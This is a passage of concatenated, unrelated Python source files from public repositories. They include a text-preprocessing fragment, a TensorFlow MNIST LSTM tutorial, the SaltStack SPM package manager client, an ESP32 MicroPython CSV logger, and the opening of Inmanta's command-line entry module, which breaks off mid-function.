df["q2"] = df["question2"].apply(prep, args=(vocabs,))
print("basic preprocessing done")
# tokenize
#df["q1_tokens"] = df["q1"].apply(tokenize_wrapper)
#df["q2_tokens"] = df["q2"].apply(tokenize_wrapper)
# add phone numbers if exists
df["q1_phone_us"] = df["q1"].apply(extract_phone)
df["q2_phone_us"] = df["q2"].apply(extract_phone)
except:
traceback.print_exc()
raise Exception("Exception")
return iproc, df
def extract_phone(text):
"""
extract a phone number
Args:
text: a question
Returns:
an empty string or a phone number
"""
try:
# assumes there is only one us number in one question but this might be wrong
for match in phonenumbers.PhoneNumberMatcher(text, "US"):
return phonenumbers.format_number(match.number, phonenumbers.PhoneNumberFormat.E164)
except:
pass
return ""
def preprocess(files, outdir):
for f in files:
df = pd.read_csv(f)
df = run(shared_resource, df_train, nprocs)
print("loading {0}".format(os.path.basename(preprocess.WORD2VEC_FILE)))
t = time.time()
word2vec = gensim.models.KeyedVectors.load_word2vec_format(
preprocess.WORD2VEC_FILE, binary=True)
print("done ({0} sec)".format(round(time.time() - t)))
vocabs = word2vec.vocab.keys()
# preprocess all data
print("initialize shared resource")
shared_resource = preprocess.init_shared_resource(vocabs)
def main(argv):
args = parse_args(argv)
preprocess(args.files, args.outdir)
if __name__ == '__main__':
exit(main(sys.argv[1:]))
| StarcoderdataPython |
6458540 | <filename>dis_sdk_python_demo/createstream_sample.py
#!/usr/bin/python
# -*- coding:utf-8 -*-
from dis_sdk_python import *
stream_name="dis_test1"
partition_count=1
def createStream_test():
cli = disclient(endpoint='', ak='', sk='', projectid='', region='')
try:
r=cli.createStream(stream_name,partition_count,data_type='JSON',stream_type='COMMON')
print(r.statusCode)
except Exception as ex:
print(str(ex))
if __name__ == '__main__':
print("start createStream ")
createStream_test()
| StarcoderdataPython |
5083051 | <reponame>zyf668/ml_code
# -*- coding: utf-8 -*-
# Recurrent Neural Network (RNN)
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
# load data
mnist = input_data.read_data_sets('MNIST_data', one_hot=True)
# hyper parameters
lr = 0.001
training_iters = 100000
batch_size = 128
#display_step = 10
n_inputs = 28 # mnist data input (img shape: 28*28)
n_steps = 28 # time steps
n_hidden_units = 128 # neurons in hidden layer
n_classes = 10 # mnist classes (0-9 digits)
# tf graph input
x = tf.placeholder(tf.float32, [None, n_steps, n_inputs])
y = tf.placeholder(tf.float32, [None, n_classes])
# define weights & biases
weights = {
# (28, 128)
'in': tf.Variable(tf.random_normal([n_inputs, n_hidden_units])),
# (128, 10)
'out': tf.Variable(tf.random_normal([n_hidden_units, n_classes]))
}
biases = {
# (128,)
'in': tf.Variable(tf.constant(0.1, shape=[n_hidden_units, ])),
'out': tf.Variable(tf.constant(0.1, shape=[n_classes, ]))
}
### define RNN ###
def RNN(X, weights, biases):
## hidden layer for input to cell
# X ( 128 batch, 28 steps, 28 inputs ) -> ( 128 * 28, 28 inputs )
X = tf.reshape(X, [-1, n_inputs])
X_in = tf.matmul(X, weights['in']) + biases['in']
# X_in -> ( 128 batch * 28 steps, 128 hidden )
X_in = tf.reshape(X_in, [-1, n_steps, n_hidden_units])
## cell
lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(
num_units=n_hidden_units, forget_bias=1.0, state_is_tuple=True)
# LSTM cell is divided into 2 parts ( c_state, m_state )
_init_state = lstm_cell.zero_state(batch_size, tf.float32)
outputs, states = tf.nn.dynamic_rnn(
cell=lstm_cell, inputs=X_in, initial_state=_init_state, time_major=False)
## hidden layer for outputs as results
results = tf.matmul(states[1], weights['out']) + biases['out']
return results
pred = RNN(x, weights, biases)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=pred))
train_op = tf.train.AdamOptimizer(lr).minimize(cost)
correct_pred = tf.equal(tf.argmax(pred, axis=1), tf.argmax(y, axis=1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
# start session
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
step = 0
while step * batch_size < training_iters:
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
batch_xs = batch_xs.reshape([batch_size, n_steps, n_inputs])
sess.run([train_op], feed_dict={x:batch_xs, y:batch_ys})
if step % 20 == 0:
print(sess.run(accuracy, feed_dict={x:batch_xs, y:batch_ys}))
step += 1
| StarcoderdataPython |
1909211 | import sys
l1=[]
l2=[]
l1=map(int,sys.stdin.readline().split())
from collections import OrderedDict
l2=list(OrderedDict((x,True) for x in l1).keys())
for i in l2:
print(i,end=" ")
| StarcoderdataPython |
6526397 | import pandas as pd
import streamlit as st
@st.cache
def load_data(DATA_URL, nrows=None):
"""
Function reads data from the url and returns a dataframe
:param DATA_URL: str
:param nrows: int
:return: DataFrame
"""
df = pd.read_csv(DATA_URL, nrows=nrows)
return df | StarcoderdataPython |
3539893 | # -*- coding: utf-8 -*-
'''
This module provides the point of entry to SPM, the Salt Package Manager
.. versionadded:: 2015.8.0
'''
# Import Python libs
from __future__ import absolute_import, print_function
import os
import yaml
import tarfile
import shutil
import msgpack
import datetime
import hashlib
import logging
import pwd
import grp
import sys
# Import Salt libs
import salt.config
import salt.loader
import salt.utils
import salt.utils.http as http
import salt.syspaths as syspaths
import salt.ext.six as six
from salt.ext.six import string_types
from salt.ext.six.moves import input
from salt.ext.six.moves import zip
from salt.ext.six.moves import filter
# Get logging started
log = logging.getLogger(__name__)
class SPMException(Exception):
'''
Base class for SPMClient exceptions
'''
class SPMInvocationError(SPMException):
'''
Wrong number of arguments or other usage error
'''
class SPMPackageError(SPMException):
'''
Problem with package file or package installation
'''
class SPMDatabaseError(SPMException):
'''
SPM database not found, etc
'''
class SPMOperationCanceled(SPMException):
'''
SPM install or uninstall was canceled
'''
class SPMClient(object):
'''
Provide an SPM Client
'''
def __init__(self, ui, opts=None): # pylint: disable=W0231
self.ui = ui
if not opts:
opts = salt.config.spm_config(
os.path.join(syspaths.CONFIG_DIR, 'spm')
)
self.opts = opts
self.db_prov = self.opts.get('spm_db_provider', 'sqlite3')
self.files_prov = self.opts.get('spm_files_provider', 'local')
self._prep_pkgdb()
self._prep_pkgfiles()
self._init()
def _prep_pkgdb(self):
self.pkgdb = salt.loader.pkgdb(self.opts)
def _prep_pkgfiles(self):
self.pkgfiles = salt.loader.pkgfiles(self.opts)
def _init(self):
self.db_conn = self._pkgdb_fun('init')
self.files_conn = self._pkgfiles_fun('init')
def run(self, args):
'''
Run the SPM command
'''
command = args[0]
try:
if command == 'install':
self._install(args)
elif command == 'local':
self._local(args)
elif command == 'remove':
self._remove(args)
elif command == 'build':
self._build(args)
elif command == 'update_repo':
self._download_repo_metadata(args)
elif command == 'create_repo':
self._create_repo(args)
elif command == 'files':
self._list_files(args)
elif command == 'info':
self._info(args)
else:
raise SPMInvocationError('Invalid command \'{0}\''.format(command))
except SPMException as exc:
self.ui.error(str(exc))
def _pkgdb_fun(self, func, *args, **kwargs):
try:
return getattr(getattr(self.pkgdb, self.db_prov), func)(*args, **kwargs)
except AttributeError:
return self.pkgdb['{0}.{1}'.format(self.db_prov, func)](*args, **kwargs)
def _pkgfiles_fun(self, func, *args, **kwargs):
try:
return getattr(getattr(self.pkgfiles, self.files_prov), func)(*args, **kwargs)
except AttributeError:
return self.pkgfiles['{0}.{1}'.format(self.files_prov, func)](*args, **kwargs)
def _local(self, args):
'''
Process local commands
'''
args.pop(0)
command = args[0]
if command == 'install':
self._local_install(args)
elif command == 'files':
self._local_list_files(args)
elif command == 'info':
self._local_info(args)
else:
raise SPMInvocationError('Invalid local command \'{0}\''.format(command))
def _install(self, args):
'''
Install a package from a repo
'''
if len(args) < 2:
raise SPMInvocationError('A package must be specified')
packages = args[1:]
file_map = {}
optional = []
recommended = []
to_install = []
for pkg in packages:
if pkg.endswith('.spm'):
if self._pkgfiles_fun('path_exists', pkg):
comps = pkg.split('-')
comps = '-'.join(comps[:-2]).split('/')
pkg_name = comps[-1]
formula_tar = tarfile.open(pkg, 'r:bz2')
formula_ref = formula_tar.extractfile('{0}/FORMULA'.format(pkg_name))
formula_def = yaml.safe_load(formula_ref)
file_map[pkg_name] = pkg
to_, op_, re_ = self._check_all_deps(
pkg_name=pkg_name,
pkg_file=pkg,
formula_def=formula_def
)
to_install.extend(to_)
optional.extend(op_)
recommended.extend(re_)
else:
raise SPMInvocationError('Package file {0} not found'.format(pkg))
else:
to_, op_, re_ = self._check_all_deps(pkg_name=pkg)
to_install.extend(to_)
optional.extend(op_)
recommended.extend(re_)
optional = set(filter(len, optional))
self.ui.status('The following dependencies are optional:\n\t{0}\n'.format(
'\n\t'.join(optional)
))
recommended = set(filter(len, recommended))
self.ui.status('The following dependencies are recommended:\n\t{0}\n'.format(
'\n\t'.join(recommended)
))
to_install = set(filter(len, to_install))
msg = 'Installing packages:\n\t{0}\n'.format('\n\t'.join(to_install))
if not self.opts['assume_yes']:
self.ui.confirm(msg)
repo_metadata = self._get_repo_metadata()
for package in to_install:
if package in file_map:
self._install_indv_pkg(package, file_map[package])
else:
for repo in repo_metadata:
repo_info = repo_metadata[repo]
if package in repo_metadata[repo]['packages']:
cache_path = '{0}/{1}'.format(
self.opts['spm_cache_dir'],
repo
)
# Download the package
dl_path = '{0}/{1}'.format(
repo_info['info']['url'],
repo_info['packages'][package]['filename']
)
out_file = '{0}/{1}'.format(
cache_path,
repo_info['packages'][package]['filename']
)
if not os.path.exists(cache_path):
os.makedirs(cache_path)
if dl_path.startswith('file://'):
dl_path = dl_path.replace('file://', '')
shutil.copyfile(dl_path, out_file)
else:
response = http.query(dl_path, text=True)
with salt.utils.fopen(out_file, 'w') as outf:
outf.write(response.get("text"))
# Kick off the install
self._install_indv_pkg(package, out_file)
return
def _local_install(self, args, pkg_name=None):
'''
Install a package from a file
'''
if len(args) < 2:
raise SPMInvocationError('A package file must be specified')
self._install(args)
def _check_all_deps(self, pkg_name=None, pkg_file=None, formula_def=None):
'''
Starting with one package, check all packages for dependencies
'''
if pkg_file and not os.path.exists(pkg_file):
raise SPMInvocationError('Package file {0} not found'.format(pkg_file))
self.repo_metadata = self._get_repo_metadata()
if not formula_def:
for repo in self.repo_metadata:
if not isinstance(self.repo_metadata[repo]['packages'], dict):
continue
if pkg_name in self.repo_metadata[repo]['packages']:
formula_def = self.repo_metadata[repo]['packages'][pkg_name]['info']
if not formula_def:
raise SPMInvocationError('Unable to read formula for {0}'.format(pkg_name))
# Check to see if the package is already installed
pkg_info = self._pkgdb_fun('info', pkg_name, self.db_conn)
pkgs_to_install = []
if pkg_info is None or self.opts['force']:
pkgs_to_install.append(pkg_name)
elif pkg_info is not None and not self.opts['force']:
raise SPMPackageError(
'Package {0} already installed, not installing again'.format(formula_def['name'])
)
optional_install = []
recommended_install = []
if 'dependencies' in formula_def or 'optional' in formula_def or 'recommended' in formula_def:
self.avail_pkgs = {}
for repo in self.repo_metadata:
if not isinstance(self.repo_metadata[repo]['packages'], dict):
continue
for pkg in self.repo_metadata[repo]['packages']:
self.avail_pkgs[pkg] = repo
needs, unavail, optional, recommended = self._resolve_deps(formula_def)
if len(unavail) > 0:
raise SPMPackageError(
'Cannot install {0}, the following dependencies are needed:\n\n{1}'.format(
formula_def['name'], '\n'.join(unavail))
)
if optional:
optional_install.extend(optional)
for dep_pkg in optional:
pkg_info = self._pkgdb_fun('info', formula_def['name'])
msg = dep_pkg
if isinstance(pkg_info, dict):
msg = '{0} [Installed]'.format(dep_pkg)
optional_install.append(msg)
if recommended:
recommended_install.extend(recommended)
for dep_pkg in recommended:
pkg_info = self._pkgdb_fun('info', formula_def['name'])
msg = dep_pkg
if isinstance(pkg_info, dict):
msg = '{0} [Installed]'.format(dep_pkg)
recommended_install.append(msg)
if needs:
pkgs_to_install.extend(needs)
for dep_pkg in needs:
pkg_info = self._pkgdb_fun('info', formula_def['name'])
msg = dep_pkg
if isinstance(pkg_info, dict):
msg = '{0} [Installed]'.format(dep_pkg)
return pkgs_to_install, optional_install, recommended_install
def _install_indv_pkg(self, pkg_name, pkg_file):
'''
Install one individual package
'''
self.ui.status('... installing {0}'.format(pkg_name))
formula_tar = tarfile.open(pkg_file, 'r:bz2')
formula_ref = formula_tar.extractfile('{0}/FORMULA'.format(pkg_name))
formula_def = yaml.safe_load(formula_ref)
for field in ('version', 'release', 'summary', 'description'):
if field not in formula_def:
raise SPMPackageError('Invalid package: the {0} was not found'.format(field))
pkg_files = formula_tar.getmembers()
# First pass: check for files that already exist
existing_files = self._pkgfiles_fun('check_existing', pkg_name, pkg_files, formula_def)
if existing_files and not self.opts['force']:
raise SPMPackageError('Not installing {0} due to existing files:\n\n{1}'.format(
pkg_name, '\n'.join(existing_files))
)
# We've decided to install
self._pkgdb_fun('register_pkg', pkg_name, formula_def, self.db_conn)
# No defaults for this in config.py; default to the current running
# user and group
uid = self.opts.get('spm_uid', os.getuid())
gid = self.opts.get('spm_gid', os.getgid())
uname = pwd.getpwuid(uid)[0]
gname = grp.getgrgid(gid)[0]
# Second pass: install the files
for member in pkg_files:
member.uid = uid
member.gid = gid
member.uname = uname
member.gname = gname
out_path = self._pkgfiles_fun('install_file',
pkg_name,
formula_tar,
member,
formula_def,
self.files_conn)
if out_path is not False:
if member.isdir():
digest = ''
else:
self._verbose('Installing file {0} to {1}'.format(member.name, out_path), log.trace)
file_hash = hashlib.sha1()
digest = self._pkgfiles_fun('hash_file',
os.path.join(out_path, member.name),
file_hash,
self.files_conn)
self._pkgdb_fun('register_file',
pkg_name,
member,
out_path,
digest,
self.db_conn)
formula_tar.close()
def _resolve_deps(self, formula_def):
'''
Return a list of packages which need to be installed, to resolve all
dependencies
'''
pkg_info = self.pkgdb['{0}.info'.format(self.db_prov)](formula_def['name'])
if not isinstance(pkg_info, dict):
pkg_info = {}
can_has = {}
cant_has = []
if 'dependencies' in formula_def and formula_def['dependencies'] is None:
formula_def['dependencies'] = ''
for dep in formula_def.get('dependencies', '').split(','):
dep = dep.strip()
if not dep:
continue
if self.pkgdb['{0}.info'.format(self.db_prov)](dep):
continue
if dep in self.avail_pkgs:
can_has[dep] = self.avail_pkgs[dep]
else:
cant_has.append(dep)
optional = formula_def.get('optional', '').split(',')
recommended = formula_def.get('recommended', '').split(',')
inspected = []
to_inspect = can_has.copy()
while len(to_inspect) > 0:
dep = next(six.iterkeys(to_inspect))
del to_inspect[dep]
# Don't try to resolve the same package more than once
if dep in inspected:
continue
inspected.append(dep)
repo_contents = self.repo_metadata.get(can_has[dep], {})
repo_packages = repo_contents.get('packages', {})
dep_formula = repo_packages.get(dep, {}).get('info', {})
also_can, also_cant, opt_dep, rec_dep = self._resolve_deps(dep_formula)
can_has.update(also_can)
cant_has = sorted(set(cant_has + also_cant))
optional = sorted(set(optional + opt_dep))
recommended = sorted(set(recommended + rec_dep))
return can_has, cant_has, optional, recommended
def _traverse_repos(self, callback, repo_name=None):
'''
Traverse through all repo files and apply the functionality provided in
the callback to them
'''
repo_files = []
if os.path.exists(self.opts['spm_repos_config']):
repo_files.append(self.opts['spm_repos_config'])
for (dirpath, dirnames, filenames) in os.walk('{0}.d'.format(self.opts['spm_repos_config'])):
for repo_file in filenames:
if not repo_file.endswith('.repo'):
continue
repo_files.append(repo_file)
if not os.path.exists(self.opts['spm_cache_dir']):
os.makedirs(self.opts['spm_cache_dir'])
for repo_file in repo_files:
repo_path = '{0}.d/{1}'.format(self.opts['spm_repos_config'], repo_file)
with salt.utils.fopen(repo_path) as rph:
repo_data = yaml.safe_load(rph)
for repo in repo_data:
if repo_data[repo].get('enabled', True) is False:
continue
if repo_name is not None and repo != repo_name:
continue
callback(repo, repo_data[repo])
def _download_repo_metadata(self, args):
'''
Connect to all repos and download metadata
'''
def _update_metadata(repo, repo_info):
dl_path = '{0}/SPM-METADATA'.format(repo_info['url'])
if dl_path.startswith('file://'):
dl_path = dl_path.replace('file://', '')
with salt.utils.fopen(dl_path, 'r') as rpm:
metadata = yaml.safe_load(rpm)
else:
response = http.query(dl_path, text=True)
metadata = yaml.safe_load(response.get('text', '{}'))
cache_path = '{0}/{1}.p'.format(
self.opts['spm_cache_dir'],
repo
)
with salt.utils.fopen(cache_path, 'w') as cph:
msgpack.dump(metadata, cph)
repo_name = args[1] if len(args) > 1 else None
self._traverse_repos(_update_metadata, repo_name)
def _get_repo_metadata(self):
'''
Return cached repo metadata
'''
metadata = {}
if not os.path.exists(self.opts['spm_cache_dir']):
os.makedirs(self.opts['spm_cache_dir'])
def _read_metadata(repo, repo_info):
cache_path = '{0}/{1}.p'.format(
self.opts['spm_cache_dir'],
repo
)
if not os.path.exists(cache_path):
raise SPMPackageError('SPM cache {0} not found'.format(cache_path))
with salt.utils.fopen(cache_path, 'r') as cph:
metadata[repo] = {
'info': repo_info,
'packages': msgpack.load(cph),
}
self._traverse_repos(_read_metadata)
return metadata
def _create_repo(self, args):
'''
Scan a directory and create an SPM-METADATA file which describes
all of the SPM files in that directory.
'''
if len(args) < 2:
raise SPMInvocationError('A path to a directory must be specified')
if args[1] == '.':
repo_path = os.environ['PWD']
else:
repo_path = args[1]
repo_metadata = {}
for (dirpath, dirnames, filenames) in os.walk(repo_path):
for spm_file in filenames:
if not spm_file.endswith('.spm'):
continue
spm_path = '{0}/{1}'.format(repo_path, spm_file)
if not tarfile.is_tarfile(spm_path):
continue
comps = spm_file.split('-')
spm_name = '-'.join(comps[:-2])
spm_fh = tarfile.open(spm_path, 'r:bz2')
formula_handle = spm_fh.extractfile('{0}/FORMULA'.format(spm_name))
formula_conf = yaml.safe_load(formula_handle.read())
repo_metadata[spm_name] = {
'info': formula_conf.copy(),
}
repo_metadata[spm_name]['filename'] = spm_file
metadata_filename = '{0}/SPM-METADATA'.format(repo_path)
with salt.utils.fopen(metadata_filename, 'w') as mfh:
yaml.dump(repo_metadata, mfh, indent=4, canonical=False, default_flow_style=False)
log.debug('Wrote {0}'.format(metadata_filename))
def _remove(self, args):
'''
Remove a package
'''
if len(args) < 2:
raise SPMInvocationError('A package must be specified')
packages = args[1:]
msg = 'Removing packages:\n\t{0}'.format('\n\t'.join(packages))
if not self.opts['assume_yes']:
self.ui.confirm(msg)
for package in packages:
self.ui.status('... removing {0}'.format(package))
if not self._pkgdb_fun('db_exists', self.opts['spm_db']):
raise SPMDatabaseError('No database at {0}, cannot remove {1}'.format(self.opts['spm_db'], package))
# Look at local repo index
pkg_info = self._pkgdb_fun('info', package, self.db_conn)
if pkg_info is None:
raise SPMInvocationError('Package {0} not installed'.format(package))
# Find files that have not changed and remove them
files = self._pkgdb_fun('list_files', package, self.db_conn)
dirs = []
for filerow in files:
if self._pkgfiles_fun('path_isdir', filerow[0]):
dirs.append(filerow[0])
continue
file_hash = hashlib.sha1()
digest = self._pkgfiles_fun('hash_file', filerow[0], file_hash, self.files_conn)
if filerow[1] == digest:
self._verbose('Removing file {0}'.format(filerow[0]), log.trace)
self._pkgfiles_fun('remove_file', filerow[0], self.files_conn)
else:
self._verbose('Not removing file {0}'.format(filerow[0]), log.trace)
self._pkgdb_fun('unregister_file', filerow[0], package, self.db_conn)
# Clean up directories
for dir_ in sorted(dirs, reverse=True):
self._pkgdb_fun('unregister_file', dir_, package, self.db_conn)
try:
self._verbose('Removing directory {0}'.format(dir_), log.trace)
os.rmdir(dir_)
except OSError:
# Leave directories in place that still have files in them
self._verbose('Cannot remove directory {0}, probably not empty'.format(dir_), log.trace)
self._pkgdb_fun('unregister_pkg', package, self.db_conn)
def _verbose(self, msg, level=log.debug):
'''
Display verbose information
'''
if self.opts.get('verbose', False) is True:
self.ui.status(msg)
level(msg)
def _local_info(self, args):
'''
List info for a package file
'''
if len(args) < 2:
raise SPMInvocationError('A package filename must be specified')
pkg_file = args[1]
if not os.path.exists(pkg_file):
raise SPMInvocationError('Package file {0} not found'.format(pkg_file))
comps = pkg_file.split('-')
comps = '-'.join(comps[:-2]).split('/')
name = comps[-1]
formula_tar = tarfile.open(pkg_file, 'r:bz2')
formula_ref = formula_tar.extractfile('{0}/FORMULA'.format(name))
formula_def = yaml.safe_load(formula_ref)
self.ui.status(self._get_info(formula_def))
def _info(self, args):
'''
List info for a package
'''
if len(args) < 2:
raise SPMInvocationError('A package must be specified')
package = args[1]
pkg_info = self._pkgdb_fun('info', package, self.db_conn)
if pkg_info is None:
raise SPMPackageError('package {0} not installed'.format(package))
self.ui.status(self._get_info(pkg_info))
def _get_info(self, formula_def):
'''
Get package info
'''
fields = (
'name',
'os',
'os_family',
'release',
'version',
'dependencies',
'os_dependencies',
'os_family_dependencies',
'summary',
'description',
)
for item in fields:
if item not in formula_def:
formula_def[item] = 'None'
if 'installed' not in formula_def:
formula_def['installed'] = 'Not installed'
return ('Name: {name}\n'
'Version: {version}\n'
'Release: {release}\n'
'Install Date: {installed}\n'
'Supported OSes: {os}\n'
'Supported OS families: {os_family}\n'
'Dependencies: {dependencies}\n'
'OS Dependencies: {os_dependencies}\n'
'OS Family Dependencies: {os_family_dependencies}\n'
'Summary: {summary}\n'
'Description:\n'
'{description}').format(**formula_def)
def _local_list_files(self, args):
'''
List files for a package file
'''
if len(args) < 2:
raise SPMInvocationError('A package filename must be specified')
pkg_file = args[1]
if not os.path.exists(pkg_file):
raise SPMPackageError('Package file {0} not found'.format(pkg_file))
formula_tar = tarfile.open(pkg_file, 'r:bz2')
pkg_files = formula_tar.getmembers()
for member in pkg_files:
self.ui.status(member.name)
def _list_files(self, args):
'''
List files for an installed package
'''
if len(args) < 2:
raise SPMInvocationError('A package name must be specified')
package = args[1]
files = self._pkgdb_fun('list_files', package, self.db_conn)
if files is None:
raise SPMPackageError('package {0} not installed'.format(package))
else:
for file_ in files:
if self.opts['verbose']:
status_msg = ','.join(file_)
else:
status_msg = file_[0]
self.ui.status(status_msg)
def _build(self, args):
'''
Build a package
'''
if len(args) < 2:
raise SPMInvocationError('A path to a formula must be specified')
self.abspath = args[1].rstrip('/')
comps = self.abspath.split('/')
self.relpath = comps[-1]
formula_path = '{0}/FORMULA'.format(self.abspath)
if not os.path.exists(formula_path):
raise SPMPackageError('Formula file {0} not found'.format(formula_path))
with salt.utils.fopen(formula_path) as fp_:
formula_conf = yaml.safe_load(fp_)
for field in ('name', 'version', 'release', 'summary', 'description'):
if field not in formula_conf:
raise SPMPackageError('Invalid package: a {0} must be defined'.format(field))
out_path = '{0}/{1}-{2}-{3}.spm'.format(
self.opts['spm_build_dir'],
formula_conf['name'],
formula_conf['version'],
formula_conf['release'],
)
if not os.path.exists(self.opts['spm_build_dir']):
os.mkdir(self.opts['spm_build_dir'])
self.formula_conf = formula_conf
formula_tar = tarfile.open(out_path, 'w:bz2')
try:
formula_tar.add(formula_path, formula_conf['name'], filter=self._exclude)
formula_tar.add(self.abspath, formula_conf['name'], filter=self._exclude)
except TypeError:
formula_tar.add(formula_path, formula_conf['name'], exclude=self._exclude)
formula_tar.add(self.abspath, formula_conf['name'], exclude=self._exclude)
formula_tar.close()
self.ui.status('Built package {0}'.format(out_path))
def _exclude(self, member):
'''
Exclude based on opts
'''
if isinstance(member, string_types):
return None
for item in self.opts['spm_build_exclude']:
if member.name.startswith('{0}/{1}'.format(self.formula_conf['name'], item)):
return None
elif member.name.startswith('{0}/{1}'.format(self.abspath, item)):
return None
return member
class SPMUserInterface(object):
'''
Handle user interaction with an SPMClient object
'''
def status(self, msg):
'''
Report an SPMClient status message
'''
raise NotImplementedError()
def error(self, msg):
'''
Report an SPM error message
'''
raise NotImplementedError()
def confirm(self, action):
'''
Get confirmation from the user before performing an SPMClient action.
Return if the action is confirmed, or raise SPMOperationCanceled(<msg>)
if canceled.
'''
raise NotImplementedError()
class SPMCmdlineInterface(SPMUserInterface):
'''
Command-line interface to SPMClient
'''
def status(self, msg):
print(msg)
def error(self, msg):
print(msg, file=sys.stderr)
def confirm(self, action):
print(action)
res = input('Proceed? [N/y] ')
if not res.lower().startswith('y'):
raise SPMOperationCanceled('canceled')
| StarcoderdataPython |
4928896 | <filename>fletcher/_dask_compat.py
from dask.dataframe.extensions import make_array_nonempty
from fletcher.base import FletcherChunkedDtype, FletcherContinuousDtype
@make_array_nonempty.register(FletcherChunkedDtype)
def _0(dtype):
return dtype.example()
@make_array_nonempty.register(FletcherContinuousDtype)
def _1(dtype):
return dtype.example()
| StarcoderdataPython |
9601485 | '''
12.80 - Write/append data to a CSV file.
The ESP32 contains a flash memory file system that is accessible via micropython.
In this example, I will show you how to store dymmy sensor data to a CSV file.
You can retrieve the data by downloading the file to your computer, or
by using a seperate program (I provide this in the next lecture).
Components
----------
- ESP32
- Nothing else.
Documentation:
* Micropython "open" function: http://docs.micropython.org/en/latest/library/builtins.html?highlight=open#open
* Python "open" function: https://docs.python.org/3/library/functions.html#open
* Flash partitions: http://docs.micropython.org/en/latest/library/esp32.html#flash-partitions
* ESP flash size: https://mpython.readthedocs.io/en/master/library/micropython/esp.html#esp.flash_size
* uos.stat: http://docs.micropython.org/en/latest/library/uos.html#uos.stat
* CPython os.stat: https://docs.python.org/3/library/os.html#os.stat
Beware:
To the best of my knowledge, there is no function that returns the amount of flash space is available for
your script to use. So, you need to consider tracking the space that your data file takes up programmatically.
A way to do this is to use the uos.stat() function, which returns information about a given file. I give an
example of how to use this function below.
Course:
MicroPython with the ESP32
https://techexplorations.com
'''
import random
from esp32 import Partition
import esp
import uos
filename = "csv_data_file.txt"
# Get some statistics:
print("Available flash space: ", esp.flash_size()) # This will give you the total amount of Flash available
partition = Partition(Partition.RUNNING)
print(partition.info()) # Print out information about the running flash partition on which you can store your files.
file_stats = uos.stat(filename)
print("File size before write: ", file_stats[6]) # the item at index 6 of the tupple contains the total bytes in the file.
# This loop will add 10 lines that contain dummy comma-delimited data.
for x in range(10):
random_temp = random.randint(0, 50)
random_humi = random.randint(20, 90)
random_pres = random.randint(900, 1100) # in hPa
file = open (filename, "a") # Append to the end of an existing file
#new_entry = str(random_temp) + "," + str(random_humi) + "," + str(random_pres) + "\n" # Create the string that contains the dummy CSV data
new_entry = "{},{},{}\n".format(random_temp,random_humi,random_pres)
file.write(new_entry)
file.close()
file_stats = uos.stat(filename)
print("File size after write: ", file_stats[6]) # the item at index 6 of the tupple contains the total bytes in the file. | StarcoderdataPython |
6405602 | """
Copyright 2017 Inmanta
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Contact: <EMAIL>
Command line development guidelines
###################################
do's and don'ts
----------------
MUST NOT: sys.exit => use command.CLIException
SHOULD NOT: print( => use logger for messages, only print for final output
Entry points
------------
@command annotation to register new command
"""
import argparse
import asyncio
import json
import logging
import os
import signal
import socket
import sys
import threading
import time
import traceback
from asyncio import ensure_future
from configparser import ConfigParser
from threading import Timer
from types import FrameType
from typing import Any, Callable, Coroutine, Dict, Optional
import colorlog
import yaml
from tornado import gen
from tornado.ioloop import IOLoop
from tornado.util import TimeoutError
import inmanta.compiler as compiler
from inmanta import const, module, moduletool, protocol
from inmanta.ast import CompilerException, Namespace
from inmanta.ast import type as inmanta_type
from inmanta.command import CLIException, Commander, ShowUsageException, command
from inmanta.compiler import do_compile
from inmanta.config import Config, Option
from inmanta.const import EXIT_START_FAILED
from inmanta.export import ModelExporter, cfg_env
from inmanta.server.bootloader import InmantaBootloader
from inmanta.util import get_compiler_version
from inmanta.warnings import WarningsManager
try:
import rpdb
except ImportError:
rpdb = None
LOGGER = logging.getLogger("inmanta")
@command("server", help_msg="Start the inmanta server")
def start_server(options: argparse.Namespace) -> None:
if options.config_file and not os.path.exists(options.config_file):
LOGGER.warning("Config file %s doesn't exist", options.config_file)
if options.config_dir and not os.path.isdir(options.config_dir):
LOGGER.warning("Config directory %s doesn't exist", options.config_dir)
ibl = InmantaBootloader()
setup_signal_handlers(ibl.stop)
ioloop = IOLoop.current()
# handle startup exceptions
def _handle_startup_done(fut: asyncio.Future) -> None:
if fut.cancelled():
safe_shutdown(ioloop, ibl.stop)
else:
exc = fut.exception()
if exc is not None:
LOGGER.exception("Server setup failed", exc_info=exc)
traceback.print_exception(type(exc), exc, exc.__traceback__)
safe_shutdown(ioloop, ibl.stop)
else:
LOGGER.info("Server startup complete")
ensure_future(ibl.start()).add_done_callback(_handle_startup_done)
ioloop.start()
LOGGER.info("Server shutdown complete")
if not ibl.started:
exit(EXIT_START_FAILED)
@command("agent", help_msg="Start the inmanta agent")
def start_agent(options: argparse.Namespace) -> None:
from inmanta.agent import agent
a = agent.Agent()
setup_signal_handlers(a.stop)
IOLoop.current().add_callback(a.start)
IOLoop.current().start()
LOGGER.info("Agent Shutdown complete")
def dump_threads() -> None:
print("----- Thread Dump ----")
for th in threading.enumerate():
print("---", th)
if th.ident:
traceback.print_stack(sys._current_frames()[th.ident], file=sys.stdout)
print()
sys.stdout.flush()
async def dump_ioloop_running() -> None:
# dump async IO
print("----- Async IO tasks ----")
for task in asyncio.all_tasks():
print(task)
print()
sys.stdout.flush()
def context_dump(ioloop: IOLoop) -> None:
dump_threads()
if hasattr(asyncio, "all_tasks"):
ioloop.add_callback_from_signal(dump_ioloop_running)
def setup_signal_handlers(shutdown_function: Callable[[], Coroutine[Any, Any, None]]) -> None:
"""
Make sure that shutdown_function is called when a SIGTERM or a SIGINT interrupt occurs.
:param shutdown_function: The function that contains the shutdown logic.
"""
# ensure correct ioloop
ioloop = IOLoop.current()
def hard_exit() -> None:
context_dump(ioloop)
sys.stdout.flush()
# Hard exit, not sys.exit
# ensure shutdown when the ioloop is stuck
os._exit(const.EXIT_HARD)
def handle_signal(signum: signal.Signals, frame: Optional[FrameType]) -> None:
